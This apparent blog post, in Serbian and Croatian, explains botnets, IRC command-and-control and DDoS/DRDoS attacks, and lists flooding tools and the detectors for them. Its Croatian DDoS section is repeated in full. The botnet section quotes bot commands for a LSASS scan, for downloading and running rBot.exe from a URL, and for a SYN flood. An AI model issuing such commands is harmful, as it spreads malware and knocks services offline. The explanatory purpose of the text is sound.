BotNet
BotNet označava mrežu zaraženih računara na Internetu. Termin je nastao spajanjem reči BOT (od Robot) i NET, koja znači mreža. BotNet mrežu je moguće daljinski kontrolisati i najčešće se koristi za slanje SPAM pošte ili organizovanje DDoS napada. BotNet ili Zombi mreža, danas se može iznajmiti za stotinak dolara i smatra se da je od 5 do 12 miliona računara širom sveta u uključeno u nekoj od BotNet mreža. Najčeće se radi o kućnim PC računarima, bez adekvatne Firewall i Anti-Virus zaštite.
Mehanizam rada
Zombi računar nastaje posle zaraze virusom koji otvara TCP komunikacioni port preko koga se u računar neovlašćeno ubacuje Trojan program. Ovaj program se kasnije, prema potrebi aktivira za neki od zadataka kao što su slanje SPAM pošte, širenje drugih virusa ili DDoS napad na neki Web sajt ili DNS sistem.
BotNet mreža se formira iz komercijalnih razloga, što može biti zarada od slanja SPAM pošte ili ometanje konkurencije. Najveći problem za organizatora ovakvih operacija je upravo komandna kontrola mreže. Osnovni cilj je da “kontrola” ostane nevidljiva za korisnika, zbog čega se često koristi komunikacija putem IRC (čet) kanala. To, na primer, znači da se Trojan komponenta povremeno priključuje na neki javni IRC kanal, sa koga dobija dalje instrukcije šta treba da “uradi”.
IRC BOT je nešto stariji termin i tehnologija, koja je našla svoje mesto u savremenim BotNet mrežama. Radi se o raznim programima koji su kompatibilni sa IRC specifikacijom (RFC 1459) i koji pasionirani korisnici IRC sistema koriste za svoje (uglavnom normalne) potrebe. U kontekstu BotNet mreže, IRC BOT je zlonamerni program koji uspostvalja kontrolu nad Trojan komponentama koje su se prijavile na kontrolnom IRC kanalu.
Ova zloupotreba IRC-a je dovela do toga da većina konvencionalnih IRC sistema blokira pristup sa poznatih BotNet mreža, tako da “kontroleri” moraju da nađu nove ili čak formiraju sopstvene ilegalne IRC servere.
Zombi računar ne mora da obavezno koristi IRC sistem kontrole. To može biti i Web pristup preko kompromitovanog Web servera. Suština je da Trojan/BOT komponenta pokrene konekciju ka nekom uobičajenom servisu (kao što je Web ili IRC) i tako ostane neprimećena i odobrena od Firewall-a.
SPAM i Phishing
Prema novijim analizama, smatra se da je oko 200 pojedinaca ili grupa odgovorno za slanje 80% SPAM pošte širom sveta. Postoje top liste najnotornijih spamera na kojima se nalaze organizatori iz Ukrajine, Rusije, SAD i Kine.
SPAM pošta se efektivno filtrira primenom DNS “crnih listi” (RBL), Međutim kako je SPAM pošta došla posredstvom neke Zombi mreže, ista mreža se može okrenuti protiv DNS sistema koji hostuje pojedinu crnu listu.
Slična situacija je i sa anti-Phishing sistemima. Zombi mreža se lako usmerava protiv DNS sistema koji obezbeđuje rad anti-Phishing sistema.
Efekti
Ovakvih slučajeva ima sve više i više. Skorašnji primer (početkom decembra) je DDoS napad na EveryDNS radi obaranja PhishTank anti-Phishing sistema. (Phishing je pokušaj krađe podataka o nečijem računu u banci, a Phishing poruke se šalju SPAM mrežom.) Na vrhuncu napada, EveryDNS je zasut saobraćajem od preko 400 Mbps (miliona-bita-u-sekundi) po sistemu, na 4 lokacije širom sveta.
Možemo da pretpostavimo i procenimo da su za ovakav napad bile potrebne Zombi mreže sa ukupno 8.000 računara. Prema novijim podacima, na crnom tržištu Zombi sistem od 5.500 računara se može iznajmiti za samo 350 dolara nedeljno. Ovime dolazimo do budžeta manjeg od 1.000 dolara za napadača i neuporedivo većom štetom za napadnut sistem.
U ovakvim situacijama, zbog nesrazmerno velike snage DDoS napada, napadnuti (sistem) teško može da se odbrani. Problem je utoliko veći, što napad dolazi sa raznih strana sveta, tako da ne možete jednostavno da iskučite pojedine regije ili opsege adresa i time umanjite efekat napada. Tehnički gledano, u trenutku intenzivnog DDoS napada filtriranje saobraćaja ne daje rezultat jer će ruta do filtera biti preopterećena.
EveryDNS se prema svom saopštenju “uspešno odbranio”. Svojim ISP provajderima zameraju što su im povremeno potpuno blokirali saobraćaj, umesto da samo “filtriraju” i time održe njihov sistem u radu.
BOT-ovi
Pokušaćemo ukratko da prikažemo savremene IRC BOT komponente.
- Agobot/Phatbot/Forbot/XtremBot
Registrovano je preko 500 verzija Agobot-a, zahvaljujući tome što je napisan u C++ jeziku i što je izvorni kod dostupan. Sadrži Sniffer i Rootkit zaštitu. - SDBot/RBot/UrBotRadi se o trenutno najaktivnijoj grupi IRC Bot-ova. Napisan je u C jeziku i to loše, u poređenju sa Agobot-om. Veoma je popularan.
- mIRC BOTovi - GT-BotmIRC je popularni IRC klijent za Windows, odakle i potiče ime ove grupe BOT-ova. GT je skraćenica od Global Threat (globalna opasnost).
- DSNX BotDataspy Network X je napisan u C++ jeziku i poseduje sistem Plugin-a, koji omogućavaju dalje širenje, DDoS napade, Portscan interfejs i skriveni Web server.
- Q8Q8 je veoma mali, napisan je u manje od 1.000 linija C-koda, isključivo za Unix/Linux platformu. Sadrži: izmenu koda putem HTTP protokola, razne DDOS napade (SYN Flood i UDP Flood)
Po pokretanju IRC BOT pokušava da se prijavi na predefinisani IRC server i privatni (šifrom zaštićeni) kanal. Po uspešnoj prijavi dobijaju komande za dalje širenje, na primer:
- ".advscan lsass 200 5 0 -r -s"
- ".http.update http:///~mugenxu/rBot.exe c:\msy32awds.exe 1"
U primeru je data sintaksa za ispitivanje Windows LSASS slabosti, na bazi 200 konkurentnih paraleleni procesa, beskonačnim vremenom skeniranja (0) i slučajnim principom odabira adrese koja se ispituje (-r).
Druga komanda je primer učitavanja i pokretanja programa sa date Web adrese. Ako na toj adresi nema odgovarajućeg programa, IRC BOT čeka dalje komande.
DDoS napad ima sledeću sintaksu:
- .scanstop
- .ddos.syn XX.X.XXX.XXX.XXX 21 200
- [DDoS]: Flooding: (XXX.XXX.XXX.XXX:21) for 200 seconds
BOT serveri
IRC serveri na kojima se obavlja prijava BOT-ova su najčešće kompomotivane mašine. Samo BotNet početnici koriste javne servere, jer već sa 1.000 članova Zombi zajednice prave veliki saobraćaj tokom prijave. Teško je objasniti šta na nekom IRC kanalu radi 1.000 klijenata sa imenom rbot-xxxxxx.
Za potrebe upravljanjem BotNet mrežama koriste se modifikovane, “olakšane” i optimizovane verzije IRC servera, koji mogu da podrže i do 80.000 Zombi klijenata.
Profesionalno vođeni sistemi imaju unikatni sistem komandi između servera i modifikovanih klijenata (tipa Agobot ili SDBot).
Zaključak
Prema podacima HoneyNet organizacije, koja se bavi ispitivnjem rada BotNet mreža metodom izlaganja nezaštićenih računara, tokom 4 meseca istraživanja detektovano je preko 100 BotNet mreža, koje su kontrolisale preko 200.000 različitih IP adresa. Primećene su mreže sa nekoliko stotina, pa i do 50.000 Zombi računara, a kao poseban kuriuizetet je “slučaj” jednog kućnog računara koji je bio zaražen sa 16 različitih Bot-ova.
U ovom trenutku nema tačnih podataka o globalnoj veličini BotNet mreža, a procene su deprimirajuće. Srećom, postoje decentralizovani provajderi (kao što je Akamai) koji su u stanju da se odupru većim DDoS napadima.
BotNet mreže su veliki problem kome se treba organizovano suprotstaviti.
DDoS napad
Distribuirani napad uskraćivanja usluga (DDoS - distributed denial of service) nastaje kada više (prethodno)
kompromitiranih sustava poplavljuje resurse ciljanih sustava, obično jednog ili više web poslužitelja.
Napadač počinje DDoS napad iskorištavanjem ranjivosti jednog sustava te stvara DDoS „gospodara“ (eng.
master). Zatim komunicira s ostalim sustavima koji su ranjivi te učitava posebne alate na mnoge, a ponekad i
tisuće, sustava čiju je ranjivost uspio iskoristiti. Jednom naredbom napadač pokreće brojne napade
poplavljivanja paketima na ciljano računalo što uzrokuje uskraćivanje usluga.
Razni zlonamjerni programi mogu u sebi nositi mehanizme DDoS napada, a jedan od poznatih primjera za to
je računalni virus „MyDoom“ čiji se mehanizam pokreće u određeno vrijeme određenog datuma. Korisnički
sustav, žrtva, može također biti ugrožen zlonamjernim programom iz vrste trojanaca (eng. trojan), koji od
napadača preuzima Zombi agenta.
Metode DDoS napada
DDoS napad možemo podijeliti u dvije osnovne grupe: tipični i reflektirani DDoS napad. Osim toga,
postoje još neki oblici napada koji su posebno istaknuti u nastavku.
Peer-to-peer napad
Napadači su otkrili način iskorištavanja nekoliko nedostataka u peer-to-peer (veza jedan-na-jedan)
poslužiteljima za pokretanje DDoS napada. Prilikom izvođenja napada, napadač nalaže klijentima
velikih peer-to-peer čvorišta za dijeljenje datoteka da se isključe iz svojih peer-to-peer mreža i spoje
na žrtvino računalo. Kao rezultat toga, nekoliko tisuća računala može se agresivno pokušati
povezati s ciljanim računalom. Iako tipični web poslužitelj može obrađivati nekoliko stotina veza u
sekundi prije nego što mu performanse počnu opadati, većina web poslužitelja pada gotovo
odmah pri pet ili šest tisuća veza / sec. Prilikom peer-to-peer napada web stranica može biti
pogođena sa 750.000 veza u kratkom vremenu.
DNS Backbone DDoS napad
DNS Backbone DDoS napad je napad u kojem se zlonamjerni korisnik koristi DDoS napadom kako
bi razbio jedan ili više DNS poslužitelja. DNS (eng. Domain Name System) poslužitelj služi za
prevođenje tekstualnih imena poslužitelja u IP adrese. Izvođenje ovog napada može biti vrlo
štetno jer dolazi do velikog gubitka prometa. Napad se izvodi kao i obični DDoS napad samo što se
usmjerava protiv DNS poslužitelja.
Tipični DDoS napad
U tipičnom DDoS napadu vojska napadača se sastoji od zombi gospodara i zombi robova.
Poslužitelji su komprimirani uređaji koji su nastali tijekom procesa skeniranja i sadrže zlonamjerni
kod. Napadač koordinira i naređuje gospodaru koji zatim proslijedi naredbu robovima. Konkretnije,
napadač šalje naredbu za napad gospodaru i aktivira sve procese napada na tim uređajima, koji su
u stanju hibernacije, čekanja na odgovarajuću naredbu da se probude i počnu napad. Zatim
gospodari, potaknuti ovim procesima, šalju naredbe za napad robovima naređujući im da počnu
DDoS napad na ciljani uređaj. Na taj način, robovi počinju slati veliki obujam paketa na ciljani
uređaj, poplavljujući svoje sustave beskorisnim opterećenjem i iskorištavaju svoje resurse. Slika 4
prikazuje ovu vrstu DDoS napada.
U slučajevima DDoS napada, koriste se lažirane IP adrese izvora u paketima. Napadači preferiraju
korištenje takvih krivotvorenih izvornih IP adresa iz dva glavna razloga. Prvi je skrivanje identiteta
zombi strojeva da bi napadači sakrili svoj identitet. Drugi razlog odnosi se na izvođenje napada,
kada napadači žele onemogućiti bilo koji pokušaj filtriranja prometa na računalu žrtvi.
DRDoS napad
DRDoS (eng. distributed reflected denial of service) uključuje slanje lažnih zahtjeva na vrlo velik
broj računala koja odgovaraju na njih. Izvorišna adresa unutar zahtjeva postavljena je tako da svi
odgovori idu na ciljano računalo. Time dolazi do iskorištavanja resursa te uskraćivanja usluga.
DRDoS napad generira istu količinu prometa kao i DDoS napad, ali koristi efikasniju metodu za
postizanje toga. Slika 5 prikazuje korake DRDoS napada. Kada poslužitelj prima SYN paket
odgovora SYN / ACK paketom – to su prva dva koraka za uspostavu veze. Pri napadu šalje se SYN
paket bilo kojem od javno dostupnih poslužitelja s lažiranom izvornom IP adresom koja pokazuje
na ciljanu žrtvu napada. Primatelj SYN paketa generira SYN / ACK i šalje ga žrtvi. Na ovaj način
poslužitelj se koristi da bi odražavao pakete na ciljanu mrežu, a ne za slanje paketa izravno na cilj
kao što je slučaj u DDoS.
Slično kao i kod DDoS napada koristi se velik broj poslužitelja za slanje SYN paketa koji zatim
generiraju veliku količinu prometa. U odnosu na DDoS napad, DRDoS je napad koji može
uzrokovati više štete s manjim brojem poslužitelja. Poslužitelji koji reflektiraju ne moraju biti
ranjivi, tj. na njih ne treba provaljivati pa se za napad može koristiti veliki broj poslužitelja koji su
inače dobro zaštićeni.
Jedna od mogućnosti zaštite sustava od DRDoS napada je filtriranje SYN/ACK paketa. Ako se
pretpostavi da je ciljano računalo zapravo poslužitelj ono nema razloga primati SYN/ACK pakete
(poslužitelji primaju samo SYN i ACK pakete). Ipak takvim postupkom filtriranja paketa moguće je
odbaciti neke korisne pakete.
Usporedba DoS i DDoS napada
Vrlo je važno primijetiti razliku između DoS i DDoS napada. Ako napadač izvodi napad iz jednog
poslužitelja taj napad će biti klasificiran kao DoS napad. U stvari, bilo koji napad na uporabljivost bi se
trebao klasificirati kao Denial of Service napad. S druge strane, ako je jedan napadač koristi tisuću zombi
sustava za istovremeno pokretanje napada taj napad će biti klasificiran kao DDoS napad. Znači, DoS
napad se provodi s jedne te iste IP adrese, dok pri DDoS napadu radi se o više IP adresa.
Još jedna važna razlika između DoS i DDoS napada je u tome što kod DDoS napada postoji mogućnost
da vlasnik nekog računala ne zna da sudjeluje u napadu. Takva računala nazivamo gospodari, a oni
upravljaju robovima. Razlike između DoS i DDoS napada prikazuje slika 6.
DDoS napad može napraviti daleko više štete mrežnim operatorima, davateljima usluga, ali i običnim
korisnicima Internet usluga. Svakim novim priključivanjem računala na Internet javlja se mogućnost
stvaranja novog gospodara ili roba.
Glavne prednosti napadača koji koristi DDoS napad su:
• više računala može generirati više prometa od jednog,
• više napada raznih računala teže je otkloniti od napada jednog računala,
• ponašanje svakog računala koje napada može biti upravljano sa nekim od alata za
automatizaciju napada što je teže pronaći i otkloniti.
U sigurnosti računalnih mreža, „povratni radarski signal“ je neželjeni efekt napada uskraćivanja usluga. U
ovoj vrsti napada, napadač lažira izvorišnu adresu u IP paketima poslanim na žrtve. U većini slučajeva,
žrtva ne može razlikovati lažirane i legitimne pakete, tako da žrtva odgovara na lažirani paket kao što bi i
inače. Ovi paketi su odgovor poznat kao povratni radarski signal.
Izvršavanje napada
Postoje brojni alati koji automatiziraju izvršavanje DDoS napada, a neki od najpoznatijih su:
1.
Jedan od poznatijih programa za DDoS napade trinoo (trin00) je skup programskih paketa koji
služe za izvođenje DDoS napada. Osnovni dio programa ima zadaću razašiljati veliki broj UDP
paketa na ciljano računalo, što znači da radi na principu UDP poplavljivanja. Kako računalo
pokušava odgovoriti na te brojne lažne zahtjeve (porukom "ICMP port unreachable") dolazi do
zasićenja resursa te na kraju do uskraćivanja usluga. Dostupan je za Windows i Linux operacijske
sustave.
2.
Nakon alata trinoo počeo je razvoj alata Tribe Flood Network (TFN) koji radi na principu ICMP,
UDP i SYN poplavljivanja te "Smurf" napada. Nedostatak alata je u tome što je dostupan samo za
operacijske sustave Linux i Solaris.
3.
Kombiniranjem karakteristika programa trinoo i TFN nastaje novi alat za izvođenje DDoS napada
nazvan Stacheldraht. Prednost alata je u tome što omogućuje automatsko lažiranje izvorne
adrese. Stacheldraht ima implementirane iste tehnike napada kao i alat TFN, a dostupan je za
operacijske sustave Linux i Solaris.
4.
Program Trinity omogućuje pokretanje više tipova poplavljivanja na ciljanu web stranicu,
uključujući UDP i SYN.
5.
Vrlo sličan programu trinoo razvijen je i program Shaft koji omogućava izvođenje raznih napada
poplavljivanjem. Također ima mogućnost kontrole veličine paketa te trajanja napada.
Revizija 1.02
6.
Alat Tribe Flood Network 2K (TFN2K) je složenija inačica alata TFN dizajnirana kako bi
onemogućila filtriranje paketa, omogućila udaljeno pokretanje naredbi i skrivanje izvorne IP
adrese s koje dolazi napad.
Postoje i mnogi noviji alati za izvršavanje napada kao što su: Mstream, Omega, Trinity, Derivatives,
myServer i Plague.
Obrana od napada
Budući da su razvijeni razni programi koji olakšavaju izvođenje DDoS napada postoje i mnogi koji služe
za obranu. Neki alati koji se mogu iskoristit kao oružje u borbi protiv DDoS napada su:
1.
Program DdoSPing je skener koji može otkriti rad programa trinoo, Stacheldraht i TFN.
Nedostatak programa je u tome što otkriva rad navedenih programa samo ako imaju izvorno
namještene postavke (eng. default) što se vrlo lako može promijeniti.
Slika 8. Sučelje programa DdoSPing
2.
Program find_ddos također se koristi za skeniranje sustava kako bi pronašao trinoo,
Stacheldraht, TFN2K i TFN programe.
3.
Program dds (eng. Distributed DoS Scanner) omogućava otkrivanje aktivnosti programa trinoo,
Stacheldraht i TFN. Dostupan je za sljedeće operacijske sustave: Linux (kernel inačica 2.2.x),
Solaris (inačice 2.6 i veće), Digital Unix 4.0d, IMB AIX 4.2, FreeBSD 3.3. i OpenBSD 2.6.
4.
Program gag skenira sustav kako bi otkrio Stacheldraht program, dok ostale programe ne može
detektirati. Navedeni alat dostupan je za iste operacijske sustave kao i alat dds.
5.
Alat RID je još jedan od skenera koji otkriva prisutnost trinoo, Stacheldraht i TFN programa.
Kao što je prikazano, većina alata za obranu od DDoS napada radi na jednakom principu: skeniraju
sustav kako bi otkrili aktivnosti nekog od alata za automatiziranje DDoS napada.
DDoS napad
Distribuirani napad uskraćivanja usluga (DDoS - distributed denial of service) nastaje kada više (prethodno)
kompromitiranih sustava poplavljuje resurse ciljanih sustava, obično jednog ili više web poslužitelja.
Napadač počinje DDoS napad iskorištavanjem ranjivosti jednog sustava te stvara DDoS „gospodara“ (eng.
master). Zatim komunicira s ostalim sustavima koji su ranjivi te učitava posebne alate na mnoge, a ponekad i
tisuće, sustava čiju je ranjivost uspio iskoristiti. Jednom naredbom napadač pokreće brojne napade
poplavljivanja paketima na ciljano računalo što uzrokuje uskraćivanje usluga.
Razni zlonamjerni programi mogu u sebi nositi mehanizme DDoS napada, a jedan od poznatih primjera za to
je računalni virus „MyDoom“ čiji se mehanizam pokreće u određeno vrijeme određenog datuma. Korisnički
sustav, žrtva, može također biti ugrožen zlonamjernim programom iz vrste trojanaca (eng. trojan), koji od
napadača preuzima Zombi agenta.
Metode DDoS napada
DDoS napad možemo podijeliti u dvije osnovne grupe: tipični i reflektirani DDoS napad. Osim toga,
postoje još neki oblici napada koji su posebno istaknuti u nastavku.
Peer-to-peer napad
Napadači su otkrili način iskorištavanja nekoliko nedostataka u peer-to-peer (veza jedan-na-jedan)
poslužiteljima za pokretanje DDoS napada. Prilikom izvođenja napada, napadač nalaže klijentima
velikih peer-to-peer čvorišta za dijeljenje datoteka da se isključe iz svojih peer-to-peer mreža i spoje
na žrtvino računalo. Kao rezultat toga, nekoliko tisuća računala može se agresivno pokušati
povezati s ciljanim računalom. Iako tipični web poslužitelj može obrađivati nekoliko stotina veza u
sekundi prije nego što mu performanse počnu opadati, većina web poslužitelja pada gotovo
odmah pri pet ili šest tisuća veza / sec. Prilikom peer-to-peer napada web stranica može biti
pogođena sa 750.000 veza u kratkom vremenu.
DNS Backbone DDoS napad
DNS Backbone DDoS napad je napad u kojem se zlonamjerni korisnik koristi DDoS napadom kako
bi razbio jedan ili više DNS poslužitelja. DNS (eng. Domain Name System) poslužitelj služi za
prevođenje tekstualnih imena poslužitelja u IP adrese. Izvođenje ovog napada može biti vrlo
štetno jer dolazi do velikog gubitka prometa. Napad se izvodi kao i obični DDoS napad samo što se
usmjerava protiv DNS poslužitelja.
Tipični DDoS napad
U tipičnom DDoS napadu vojska napadača se sastoji od zombi gospodara i zombi robova.
Poslužitelji su komprimirani uređaji koji su nastali tijekom procesa skeniranja i sadrže zlonamjerni
kod. Napadač koordinira i naređuje gospodaru koji zatim proslijedi naredbu robovima. Konkretnije,
napadač šalje naredbu za napad gospodaru i aktivira sve procese napada na tim uređajima, koji su
u stanju hibernacije, čekanja na odgovarajuću naredbu da se probude i počnu napad. Zatim
gospodari, potaknuti ovim procesima, šalju naredbe za napad robovima naređujući im da počnu
DDoS napad na ciljani uređaj. Na taj način, robovi počinju slati veliki obujam paketa na ciljani
uređaj, poplavljujući svoje sustave beskorisnim opterećenjem i iskorištavaju svoje resurse. Slika 4
prikazuje ovu vrstu DDoS napada.
U slučajevima DDoS napada, koriste se lažirane IP adrese izvora u paketima. Napadači preferiraju
korištenje takvih krivotvorenih izvornih IP adresa iz dva glavna razloga. Prvi je skrivanje identiteta
zombi strojeva da bi napadači sakrili svoj identitet. Drugi razlog odnosi se na izvođenje napada,
kada napadači žele onemogućiti bilo koji pokušaj filtriranja prometa na računalu žrtvi.
DRDoS napad
DRDoS (eng. distributed reflected denial of service) uključuje slanje lažnih zahtjeva na vrlo velik
broj računala koja odgovaraju na njih. Izvorišna adresa unutar zahtjeva postavljena je tako da svi
odgovori idu na ciljano računalo. Time dolazi do iskorištavanja resursa te uskraćivanja usluga.
DRDoS napad generira istu količinu prometa kao i DDoS napad, ali koristi efikasniju metodu za
postizanje toga. Slika 5 prikazuje korake DRDoS napada. Kada poslužitelj prima SYN paket
odgovora SYN / ACK paketom – to su prva dva koraka za uspostavu veze. Pri napadu šalje se SYN
paket bilo kojem od javno dostupnih poslužitelja s lažiranom izvornom IP adresom koja pokazuje
na ciljanu žrtvu napada. Primatelj SYN paketa generira SYN / ACK i šalje ga žrtvi. Na ovaj način
poslužitelj se koristi da bi odražavao pakete na ciljanu mrežu, a ne za slanje paketa izravno na cilj
kao što je slučaj u DDoS.
Slično kao i kod DDoS napada koristi se velik broj poslužitelja za slanje SYN paketa koji zatim
generiraju veliku količinu prometa. U odnosu na DDoS napad, DRDoS je napad koji može
uzrokovati više štete s manjim brojem poslužitelja. Poslužitelji koji reflektiraju ne moraju biti
ranjivi, tj. na njih ne treba provaljivati pa se za napad može koristiti veliki broj poslužitelja koji su
inače dobro zaštićeni.
Jedna od mogućnosti zaštite sustava od DRDoS napada je filtriranje SYN/ACK paketa. Ako se
pretpostavi da je ciljano računalo zapravo poslužitelj ono nema razloga primati SYN/ACK pakete
(poslužitelji primaju samo SYN i ACK pakete). Ipak takvim postupkom filtriranja paketa moguće je
odbaciti neke korisne pakete.
Usporedba DoS i DDoS napada
Vrlo je važno primijetiti razliku između DoS i DDoS napada. Ako napadač izvodi napad iz jednog
poslužitelja taj napad će biti klasificiran kao DoS napad. U stvari, bilo koji napad na uporabljivost bi se
trebao klasificirati kao Denial of Service napad. S druge strane, ako je jedan napadač koristi tisuću zombi
sustava za istovremeno pokretanje napada taj napad će biti klasificiran kao DDoS napad. Znači, DoS
napad se provodi s jedne te iste IP adrese, dok pri DDoS napadu radi se o više IP adresa.
Još jedna važna razlika između DoS i DDoS napada je u tome što kod DDoS napada postoji mogućnost
da vlasnik nekog računala ne zna da sudjeluje u napadu. Takva računala nazivamo gospodari, a oni
upravljaju robovima. Razlike između DoS i DDoS napada prikazuje slika 6.
DDoS napad može napraviti daleko više štete mrežnim operatorima, davateljima usluga, ali i običnim
korisnicima Internet usluga. Svakim novim priključivanjem računala na Internet javlja se mogućnost
stvaranja novog gospodara ili roba.
Glavne prednosti napadača koji koristi DDoS napad su:
• više računala može generirati više prometa od jednog,
• više napada raznih računala teže je otkloniti od napada jednog računala,
• ponašanje svakog računala koje napada može biti upravljano sa nekim od alata za
automatizaciju napada što je teže pronaći i otkloniti.
U sigurnosti računalnih mreža, „povratni radarski signal“ je neželjeni efekt napada uskraćivanja usluga. U
ovoj vrsti napada, napadač lažira izvorišnu adresu u IP paketima poslanim na žrtve. U većini slučajeva,
žrtva ne može razlikovati lažirane i legitimne pakete, tako da žrtva odgovara na lažirani paket kao što bi i
inače. Ovi paketi su odgovor poznat kao povratni radarski signal.
Izvršavanje napada
Postoje brojni alati koji automatiziraju izvršavanje DDoS napada, a neki od najpoznatijih su:
1.
Jedan od poznatijih programa za DDoS napade trinoo (trin00) je skup programskih paketa koji
služe za izvođenje DDoS napada. Osnovni dio programa ima zadaću razašiljati veliki broj UDP
paketa na ciljano računalo, što znači da radi na principu UDP poplavljivanja. Kako računalo
pokušava odgovoriti na te brojne lažne zahtjeve (porukom "ICMP port unreachable") dolazi do
zasićenja resursa te na kraju do uskraćivanja usluga. Dostupan je za Windows i Linux operacijske
sustave.
2.
Nakon alata trinoo počeo je razvoj alata Tribe Flood Network (TFN) koji radi na principu ICMP,
UDP i SYN poplavljivanja te "Smurf" napada. Nedostatak alata je u tome što je dostupan samo za
operacijske sustave Linux i Solaris.
3.
Kombiniranjem karakteristika programa trinoo i TFN nastaje novi alat za izvođenje DDoS napada
nazvan Stacheldraht. Prednost alata je u tome što omogućuje automatsko lažiranje izvorne
adrese. Stacheldraht ima implementirane iste tehnike napada kao i alat TFN, a dostupan je za
operacijske sustave Linux i Solaris.
4.
Program Trinity omogućuje pokretanje više tipova poplavljivanja na ciljanu web stranicu,
uključujući UDP i SYN.
5.
Vrlo sličan programu trinoo razvijen je i program Shaft koji omogućava izvođenje raznih napada
poplavljivanjem. Također ima mogućnost kontrole veličine paketa te trajanja napada.
Revizija 1.02
6.
Alat Tribe Flood Network 2K (TFN2K) je složenija inačica alata TFN dizajnirana kako bi
onemogućila filtriranje paketa, omogućila udaljeno pokretanje naredbi i skrivanje izvorne IP
adrese s koje dolazi napad.
Postoje i mnogi noviji alati za izvršavanje napada kao što su: Mstream, Omega, Trinity, Derivatives,
myServer i Plague.
Obrana od napada
Budući da su razvijeni razni programi koji olakšavaju izvođenje DDoS napada postoje i mnogi koji služe
za obranu. Neki alati koji se mogu iskoristit kao oružje u borbi protiv DDoS napada su:
1.
Program DdoSPing je skener koji može otkriti rad programa trinoo, Stacheldraht i TFN.
Nedostatak programa je u tome što otkriva rad navedenih programa samo ako imaju izvorno
namještene postavke (eng. default) što se vrlo lako može promijeniti.
Slika 8. Sučelje programa DdoSPing
2.
Program find_ddos također se koristi za skeniranje sustava kako bi pronašao trinoo,
Stacheldraht, TFN2K i TFN programe.
3.
Program dds (eng. Distributed DoS Scanner) omogućava otkrivanje aktivnosti programa trinoo,
Stacheldraht i TFN. Dostupan je za sljedeće operacijske sustave: Linux (kernel inačica 2.2.x),
Solaris (inačice 2.6 i veće), Digital Unix 4.0d, IMB AIX 4.2, FreeBSD 3.3. i OpenBSD 2.6.
4.
Program gag skenira sustav kako bi otkrio Stacheldraht program, dok ostale programe ne može
detektirati. Navedeni alat dostupan je za iste operacijske sustave kao i alat dds.
5.
Alat RID je još jedan od skenera koji otkriva prisutnost trinoo, Stacheldraht i TFN programa.
Kao što je prikazano, većina alata za obranu od DDoS napada radi na jednakom principu: skeniraju
sustav kako bi otkrili aktivnosti nekog od alata za automatiziranje DDoS napada.
Нема коментара:
Постави коментар